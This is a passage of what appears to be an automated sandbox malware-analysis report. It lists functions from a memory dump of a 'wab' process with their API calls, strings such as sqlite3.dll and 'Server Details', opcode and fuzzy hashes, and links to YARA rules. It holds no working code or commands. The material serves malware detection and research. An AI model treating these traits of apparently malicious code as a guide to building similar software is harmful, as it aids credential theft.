                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscat$_mbscpystrlen
                                                                                                                • String ID: sqlite3.dll
                                                                                                                • API String ID: 1983510840-1155512374
                                                                                                                • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                                • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                                • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                                • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileString
                                                                                                                • String ID: A4@$Server Details
                                                                                                                • API String ID: 1096422788-4071850762
                                                                                                                • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                                • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0042C821 Relevance: 5.2, APIs: 4, Instructions: 185COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 438689982-0
                                                                                                                • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                                                • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3110682361-0
                                                                                                                • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                                • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                                • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                                • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3510742995-0
                                                                                                                • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                                • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040998E Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1860491036-0
                                                                                                                • Opcode ID: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                                                                                                • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                                                                                                • Opcode Fuzzy Hash: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                                                                                                • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%